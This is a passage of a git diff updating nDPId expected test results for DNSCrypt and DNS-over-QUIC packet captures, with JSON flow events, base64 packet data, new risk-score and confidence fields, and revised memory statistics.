vq32P23lHeY6n+mIbu2PA0gvFaxx5jWM3JmDKSD0o30ViNPe03NlnYSlQiW5FJ\/53xHptvxGrdm48kY+bJUL4BJa9O5+PfC0wB2a+yNdgtZ8d2Ojegp\/kYc3D4fTqTKjslUMThhuPbtzJcJR7XXfKIBDV5cnnDp7d+CI2Oar3wr\/zAoz9VHG24IjueUhl9sB9wO4qD\/KiPSpxNze8cwgJ24e6LGZ2e3Ay\/9kJIVk41uXqrdi54bVgXRXtvYhvorxpHXFV0LMZL2KCV8o9YlluRovDnaKb2GjLy3\/KKvuxcfe8RkRT3HoRtfYQolh6A5Hcjo\/jY6K8WK9AYDN4oGnBq2Zj4\/\/kX6Io7WhFljPtCYlDuu6c2DaooeLWfDA4aiTOcgajr55j+xPLf7QCmTIPnSNaljtC8eAv2zKtaHTOxfqBnVS2qgCianNYsfZKJnMugiHwOoaiJRwFh7pRkLQHsaRmUwL7vL3V61gMAYHLFcSc9eFMEELE0f\/ZCqihiDw76bxMzGRDmA2k1dv1pc9dZ99Ue\/PDqBzsXDzW0KYkSPi3FTRTVCcb3S1zt0x0i8Xn8a9DcLUqsCeFC+tn1mb0dgeRDdkXiH6Q6fSweEw2PTotOKU\/j9hJM680iuH5tTNwSeded2TpAJ0+s\/qihZjedAPyx6rLEqze3DvE7LdsxMHpTPE+MsP5MLsZXG4gnX+29YRCkNE3C55pGXwdkjw9WH9Kilh0MC0xfYccaNmVdRLqWcpDKmsXOheBIMt\/4erfzigzbscKLMVmi73r5KGkOYVsW04yU067zltq+0GH3UBPFcd61oBOkbsGPO4r1UmBlHZJoz0lwKh1rV3nPuBv46M4MKI6eSRqOL4FFePLAO7NiaYa+o="}
+00931{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"dnscrypt-v2.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":946760605298,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":410,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":410,"pkt_l4_len":376,"ts_msec":946760605298,"pkt":"6qmpVXFVLGv1oHfACABFAAGMP3pAADYR4Ix\/AAACfwAAARTpxs0BeEafcjZmbnZXajgMNKrUz4BH5JtgTO\/vSxmsaEEZ\/CAi1tHviASLJ0uizAKXOLABetwgqhCo5m4k1iiphPsQtmERIqMf5JqXqiSdLy1Ba297cOraSOTaFHJWit3rzIV3AowJFomZ6bNGgpjxuYxUP4ApyAtzXYDJCYeu\/TSh4Op6+VkA6r1rjj0eFvuUrgX0XUc9PplmByW+parwj6z4sTPvV7M24c3XCf31OpXMDgENn0dC\/NtCYAPIhFy5yJH4NN0uv+wCzBvfx5hamAafH0ucNQEWgtIToY\/UKfIcB1p2Rmxkik4bx1XvJZRpgatWlKpSSZ2osdUqE0Gf6dev8q1ZEmaD+Nt91oo9gqW7UnB\/A+rnjMC7Jl4QB0mRDv3NPjcpvDGjZgxCT\/Cm8FWDlE6PMnj9qJUAbU8j4wyOOwo1LdjYHrXav+2Cx6qKLtaO9UmFpkeQ1L0Y\/fU\/6vod5MZsIE9xe3xRC2JrvS8Zsa2Q5fU="}
+00769{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"dnscrypt-v2.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946760605285,"flow_last_seen":946760605298,"flow_idle_time":180000,"flow_min_l4_payload_len":368,"flow_max_l4_payload_len":1088,"flow_tot_l4_payload_len":1456,"flow_avg_l4_payload_len":728,"midstream":0,"ts_msec":946760605298,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.2","src_port":50893,"dst_port":5353,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"dnscrypt-v2.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946760605285,"flow_last_seen":946760605298,"flow_idle_time":180000,"flow_min_l4_payload_len":368,"flow_max_l4_payload_len":1088,"flow_tot_l4_payload_len":1456,"flow_avg_l4_payload_len":728,"midstream":0,"ts_msec":946760605298,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.2","src_port":50893,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"dnscrypt-v2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946760521313,"flow_last_seen":946760521327,"flow_idle_time":180000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":1088,"flow_tot_l4_payload_len":1328,"flow_avg_l4_payload_len":664,"midstream":0,"ts_msec":946760605298,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.2","src_port":38650,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"dnscrypt-v2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946760605202,"flow_last_seen":946760605216,"flow_idle_time":180000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":1088,"flow_tot_l4_payload_len":1264,"flow_avg_l4_payload_len":632,"midstream":0,"ts_msec":946760605298,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.2","src_port":42883,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00159{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":6,"source":"dnscrypt-v2.pcap","alias":"nDPId-test","total-events-serialized":17}
+~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
+~~ packets captured/processed: 6/6
+~~ skipped flows.............: 0
+~~ total layer4 data length..: 4048 bytes
+~~ total detected protocols..: 3
+~~ total active/idle flows...: 3/3
+~~ total timeout flows.......: 0
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+~~ total memory allocated....: 4681700 bytes
+~~ total memory freed........: 4681700 bytes
+~~ total allocations/frees...: 101155/101155
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+~~ json string min len.......: 164 chars
+~~ json string max len.......: 1917 chars
+~~ json string avg len.......: 1110 chars
diff --git a/test/results/dnscrypt_skype_false_positive.pcapng.out b/test/results/dnscrypt_skype_false_positive.pcapng.out
index fdcea5bd3..d308e87bd 100644
--- a/test/results/dnscrypt_skype_false_positive.pcapng.out
+++ b/test/results/dnscrypt_skype_false_positive.pcapng.out
@@ -23,9 +23,9 @@
 ~~ total active/idle flows...: 3/3
 ~~ total timeout flows.......: 2
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4597403 bytes
-~~ total memory freed........: 4597403 bytes
-~~ total allocations/frees...: 99565/99565
+~~ total memory allocated....: 4681700 bytes
+~~ total memory freed........: 4681700 bytes
+~~ total allocations/frees...: 101155/101155
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 184 chars
 ~~ json string max len.......: 1152 chars
diff --git a/test/results/doq.pcapng.out b/test/results/doq.pcapng.out
index 8602c43e8..537be80be 100644
--- a/test/results/doq.pcapng.out
+++ b/test/results/doq.pcapng.out
@@ -1,16 +1,16 @@
 00437{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"doq.pcapng","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00558{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"doq.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1606056093199,"flow_last_seen":1606056093199,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1606056093199,"l3_proto":"ip6","src_ip":"::1","dst_ip":"::1","src_port":47826,"dst_port":784,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02128{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"doq.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1606056093199,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"ts_msec":1606056093199,"pkt":"AAAAAAAAAAAAAAAAht1gJqqiBNgRQAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAButIDEATYBOvN\/wAAIAhwsYltsps+WghOL+O5iCYx+QBEtgiJINLAj38+CB9CqAWNGDJ\/Ht0GdZPYPfPv0gkn+G7KypaOwXpeaLqP2vrcKno6\/xJHt9kjbL2TY4b\/m9R6nztt0oBs85JJhS7Tj\/KxdnJUR5x1KoMSoiK8Up0wKQjS6CJwz+096+5cglByj68BpzrUHMPeI6GM8BR\/Wl2qjunMufbT3ODI125lDdGTaTqNLCMEIjagI12Vrkh1+4q55QnPNmDSc9uNkJ0l5bhH58Gr3GA8HfFg35RCENcGDFpWMYVXiM4ZLQRFPmW9PqqUvAkPFdK1\/e6zKceMIWl6qFwaRZM+da6dEGVcJjr7Z+tAEETRp6uqCb9nnpAvg2AYmEND50nvVEnJ0vebAvnDE4IogXJzua2gFwFm7VLYd1uL79o4iJgu\/rwI3t1+Scpc6iAB46mZWFz3fE1WDQxwSMiil9o8+U4JW1BkjaBlJjEwDLig1LbtT\/HP47m8JDRgq00wdO+B2e1saSoPUtzWH02fRpSsRwHLssxWK\/GeM8n4na9wb14wVoOdjdGJ+KEHpdBBYTSNse3PnwWrKaaP0mh7odZYLBlgeNvTBLAUy7TPWKcxmhtN6bsS\/Yjh2568CzWxz8tWmprG6YblEP1vhUU2WDKbQBSh9+e7EH2JaN6LGpgUM6\/yeDE+g\/QCDKFbnXJHaC3VNe2EpDTrUSTzTJX2ScnDPI4dI01EvvWXSfxAJzcCmkKAUz3B\/F3DS8bS2lYESb9nSox1FCQUX1S8MhWCL4jSZ4wobqLA6VEQ7puZt\/yd5mc0snO7+JferPZwSQV1jN5hdBcuNb6kj\/JG4pzUoB7QTPQcjcnBLCPQDWDzw3nQ+Ebywtgt9T0aEFqJVOTfT95bWTz6VinV\/brwfnTHpSbkUgeBvFyaDcSzRz5tFZ0q4\/gUbfajms9qKrPFsufIU5NQtKyl5gUxP+4xC0KsglyEqg4DVy8vzlOpHC9Zo8AzpD2Cd9yZUaVpS3jLxre91YlfpTBViFMhAAL1N+wl47YhA2pgyB2GGbWg1O6K4C74tiA9XM\/lrGlbtuiyqqRmlQ+OfACiiCT0\/fwnridhEP9NjW3A9LNkp5ph6u81Z1emHsIGmFkXyP7nojGy2XKkTHlNA+eKBGol\/TUgCzHu7qPwHu5vMLlk5NNq3Od8+eHViQU1LY+OXeYFHuY2S+VSf848yXn0P1WZ\/Hf4jpB8WMcPpj0cXHyY46IsajmZ4uRB40h68eDc26RMlrZAfwBIGjks8KSh5b2f1BdJ6LJ4taZkNl8x+qPVYwRdc+lJsRkcGfu+BxMBIzhOPr2wg8uauRqGpIMGiSEXt5eLhu3VHEqTuhLQrFWRwEWEm+WzY4itmVZYx3CM7zWu6j3KhN5W5HEWKe61AmbunEuzKrb9KKf1hG4Uz72IU4aUy8+qV8fLyqPe7E\/Hm\/QiosHbq0whMHw6xHc0E9dDFb7\/w2jqW\/bhRCLrrZSTu8KDShAe9bkemwaFOWgs8zleXJrozrnvcOKNBpToZAop8FcA1V6SZ+05avECZK7qQ04Uc8xlehoG+3W27ZNgeNIiTH8MtU0A5kV6veOOCPQW7GGwaBK9iuORoisN7YKGMwzzN0ZIQ\/IailJpjg=="}
-00815{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"doq.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1606056093199,"flow_last_seen":1606056093199,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1606056093199,"l3_proto":"ip6","src_ip":"::1","dst_ip":"::1","src_port":47826,"dst_port":784,"l4_proto":"udp","ndpi": {"flow_risk": {"24":"SNI TLS extension was missing"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"},"quic": {"version":"TLSv1.3","alpn":"doq-i00","ja3":"c0ce40fbb78cbf86a14e6a38b26d6ede","tls_supported_versions":"TLSv1.3,TLSv1.3 (draft),TLSv1.3 (draft),TLSv1.3 (draft)"}}
+00921{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"doq.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1606056093199,"flow_last_seen":1606056093199,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1606056093199,"l3_proto":"ip6","src_ip":"::1","dst_ip":"::1","src_port":47826,"dst_port":784,"l4_proto":"udp","ndpi": {"flow_risk": {"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"},"quic": {"version":"TLSv1.3","alpn":"doq-i00","ja3":"c0ce40fbb78cbf86a14e6a38b26d6ede","tls_supported_versions":"TLSv1.3,TLSv1.3 (draft),TLSv1.3 (draft),TLSv1.3 (draft)"}}
 02132{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"doq.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1606056093201,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"ts_msec":1606056093201,"pkt":"AAAAAAAAAAAAAAAAht1gJPSDBNgRQAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAABAxC60gTYBOvN\/wAAIAhOL+O5iCYx+Qi72eOch5MP7QBAnCxpB\/ZzHhatBCMXwxT8fSrL9Wdt\/ZFOXhnvUbk6DdAuuzdAXxro6AjNqIcuTb2Re8BepV9SRKgSpP5M7LrQffcZ9shmrS20KZKb\/ztrJeGi\/T\/Srzlr49oBUZ5XMUOjcM7DeI6CgL+ZkO5L8gOV4+8ueGIUub0wiW6+Jof5086V6cR2hj9bBsTK6z5+hag0bw2HYNhsBUUI567S6uj\/AAAgCE4v47mIJjH5CLvZ45yHkw\/tRAEwp7WGjD8jV9zAfZPHhqQ1G3rU1wu59XApa\/uBCBj\/P3rsDGNWqlRQj5q2CQMAtwoaVW5R4D\/leJG\/QScVoSAiDmPCSxR8YrHk5Y7hGxh+CuYKI4vAFyF29Gcm7XH58xSv+Y0je37cyhm71z7xP4G24oT+neWXAiCImQb8UPinjOVju\/1ZXWChdKepJDE+EqJTk8BoOpF9LvyXj5n733Xph2u5IJ\/p\/3foWmTC0fAjiMQ12dhZ6KIFgHDWW0UYsYoYGxC75AmqEL4W0ZygLN4Jp+zSt6jJsE6uSWjtu9Mwx8zRmpzIUbk2rS\/lIYNH+L8sZitAI\/mAouO1FzaXzIPuVV15eTfM\/D4HfHtnBqU5JIgEq30fGDU8vQEvr9VcBwpWT5O0sL5kG6g3W7z970vBsvCXzENm+QLPGXr10ns2jeQncf3V0s9pvLk2K4TGX8jm5gNEpFEQC6sid28q4Y5Bk2mCdnHt7MFfqeIQtVf6U3jEBxXtqNwnbDuTXuCGC9PAu0Ie4j3YiB88cN+EoNanC8QpOjA3mDQP6RbMKMlxgNT1GCSYoSSr70l\/p2Vp0WohDZeycXBsQ9txnWshMbiCp8imTkzhOWSmVNhhzqZOyuIxBEnqW6hAlYSRGGlQym+AFEpgzsjqJLjzqOLeESR5tBel8x5HwEzLLqVaja5Udf5uBnGJUVNub2RGOPiMMnZCl+iL2LRMiCHUoBDmvimDtRLtAOt2SNvH93OMwXA\/IyIrY+XO56T3mS1YSU9Ydwn6d5ywddheaImd1U\/vJ57ZtUSbUvf+DXuTp09bwzrY9tw5NZDPH\/iljKwqemZHmirnsyyz4OUNANR+9\/kuYPx2d\/ZS7953Z8P\/sqzOE3LjEyoUSRCXVL4XoEkGM23PQQcDudByAaZ+9LTgkgxPTKnHgpxcDQowxdEx+BnESQ9DwSJQM7+xTAOPC9sMDrzuSInM7z5AK+Pqrk4B2Vwy+rXo798A5XjeZBrTkCt8XwQLpXhtqaRjTnFTN9kHqTE4fN2bwWBueF8sdBSZ3aK2MK9uuf3XfveW2fg\/1tyeU\/EXgKHtRL55w3iVM91ZMotsrGhoYdGkE7MCdncoh54jfxD5eJPuIFA4F254QXkd2ttFid3O1xFmVbRo9jbjk7d2+6yRzPkKLtyJyptApw6QxkBCFBxcnQA+oUEGOkjoCUtqGfeqRlTptqqqHIGzgHL7YafvSlJW897JYtCkXn4zJMDfapn6QTBVXFY5QqgjOXt2wlG+PDpn\/mQw9NRGoj69MbbDe3NA2MYvJlkgzXKIONO\/pMfrd3koD58ywf54r7NUNGTOOHuRxW0PSRKrZNlpqXdbaK\/wnr76JF4R3R\/+EOYL7g=="}
 01104{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"doq.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1606056093201,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":541,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":541,"pkt_l4_len":487,"ts_msec":1606056093201,"pkt":"AAAAAAAAAAAAAAAAht1gJPSDAecRQAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAABAxC60gHnAfrr\/wAAIAhOL+O5iCYx+Qi72eOch5MP7UD5fEmqw9QcMOSnUe6MDD2OecgnWjkNXdwC4dZSYxJC82j7Fa0gkq+nfYTDU9ChVEdtH45\/vQtNEQLo8\/fwDbneJcHDHavc8EGoV3PxsxkBJhE9Q9u9yCLvfi5OphDBHPeBIHPaxUcLs3S\/L\/IXKVQgfNTTVjkzoLHy1OXpC+\/dTEnbC6NPh6W28rc+x7GLNNHF1FfqMGoKlGMxFCg2HP4dP34NipPXt9vl2rd70ScFdoNK8lXc8OrIbXPCPHixiwns3JeTqs80ZysmuTQ2x3K2Z0oX8Qiv0kbMUxxeHDtUjo8dxO3WaXzqWjfDA1saoqoMHVxUCwkVWx\/nTk4v47mIJjH5cyeRXhMbCk5EqVB08GBVQ7VrDqROkZ4dznjO7Fxcyd8w3IE3VD3OcSvdJI5P\/k+2JVbsoJApIjU\/SqrAeDrs9BCVoOX+elSyfnlFmV+9qRiAxndyJco\/u++psEVtXikdkQ7Ddxgmc8mefhAnBHbf+ng4whbMJA82KtXAE9ITJwKPkOdTXiPwFa2uYw57B9+WqNDFf9ReX9HTME9BVtddLPrQ8G9aG6w3Krk5ZmHecrC9Btpgbpsrq+OkBS2cbpJHIvCTkg=="}
 00525{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"doq.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1606056093260,"flow_last_seen":1606056093260,"flow_idle_time":120000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":0,"ts_msec":1606056093260,"l3_proto":"ip6","src_ip":"::1","dst_ip":"::1","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3}
 00634{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"doq.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1606056093260,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":195,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":195,"pkt_l4_len":141,"ts_msec":1606056093260,"pkt":"AAAAAAAAAAAAAAAAht1gAryMAI06QAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAABAQRnKgAAAABgJPSDAF0RQAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAABAxC60gBdAHBSTi\/juYgmMflcDuw8PGqwk7AnmnlBLKl9VVw5FwNIUr\/uwhxQriWlV5lsPREfqCWcyBCgL5DIrZMPOHK4EaoyceBY8ce9ZV4nlYvSeOP\/TgYtdDng"}
-00560{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"doq.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1606056093260,"flow_last_seen":1606056093260,"flow_idle_time":120000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":0,"ts_msec":1606056093260,"l3_proto":"ip6","src_ip":"::1","dst_ip":"::1","l4_proto":"icmp6","ndpi": {"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
+00586{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"doq.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1606056093260,"flow_last_seen":1606056093260,"flow_idle_time":120000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":0,"ts_msec":1606056093260,"l3_proto":"ip6","src_ip":"::1","dst_ip":"::1","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
 00633{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"doq.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1606056093360,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":195,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":195,"pkt_l4_len":141,"ts_msec":1606056093360,"pkt":"AAAAAAAAAAAAAAAAht1gAryMAI06QAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAABAQTEgwAAAABgJPSDAF0RQAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAABAxC60gBdAHBBTi\/juYgmMfl+TZ3+Hmg+6BC4SDTuwiFJDfNooVH1WKEmkSpLklzCTh\/kA9o9N4HNfPmXD7MqNM0jiO2jHXBOtk8kidE7CVxn0BTfngjMfjmwfG7Q"}
 00634{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"doq.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1606056093560,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":195,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":195,"pkt_l4_len":141,"ts_msec":1606056093560,"pkt":"AAAAAAAAAAAAAAAAht1gAryMAI06QAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAABAQQoBAAAAABgJPSDAF0RQAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAABAxC60gBdAHBcTi\/juYgmMfl+eB8WJkIN5W\/s2kV3mgzDwRAUXXe+90zefQTxG5fKyAbzm2S0iX0HuS+7+NHu2bYpwdweEdBhQ2oYMUDLzzaxqsrt98mI\/P6gjJFj"}
-00599{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"doq.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1606056093260,"flow_last_seen":1606056096363,"flow_idle_time":120000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":846,"flow_avg_l4_payload_len":141,"midstream":0,"ts_msec":1606056096363,"l3_proto":"ip6","src_ip":"::1","dst_ip":"::1","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
-00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"doq.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1606056093199,"flow_last_seen":1606056096363,"flow_idle_time":180000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":3920,"flow_avg_l4_payload_len":280,"midstream":0,"ts_msec":1606056096363,"l3_proto":"ip6","src_ip":"::1","dst_ip":"::1","src_port":47826,"dst_port":784,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"24":"SNI TLS extension was missing"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"}}
+00625{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"doq.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1606056093260,"flow_last_seen":1606056096363,"flow_idle_time":120000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":846,"flow_avg_l4_payload_len":141,"midstream":0,"ts_msec":1606056096363,"l3_proto":"ip6","src_ip":"::1","dst_ip":"::1","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
+00788{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"doq.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1606056093199,"flow_last_seen":1606056096363,"flow_idle_time":180000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":3920,"flow_avg_l4_payload_len":280,"midstream":0,"ts_msec":1606056096363,"l3_proto":"ip6","src_ip":"::1","dst_ip":"::1","src_port":47826,"dst_port":784,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"}}
 00154{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":20,"source":"doq.pcapng","alias":"nDPId-test","total-events-serialized":14}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 20/20
@@ -20,9 +20,9 @@
 ~~ total active/idle flows...: 2/2
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4602061 bytes
-~~ total memory freed........: 4602061 bytes
-~~ total allocations/frees...: 99588/99588
+~~ total memory allocated....: 4686686 bytes
+~~ total memory freed........: 4686686 bytes
+~~ total allocations/frees...: 101178/101178
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 159 chars
 ~~ json string max len.......: 2137 chars
diff --git a/test/results/doq_adguard.pcapng.out b/test/results/doq_adguard.pcapng.out
index 8f315d367..db0a966d2 100644
--- a/test/results/doq_adguard.pcapng.out
+++ b/test/results/doq_adguard.pcapng.out
@@ -1,10 +1,10 @@
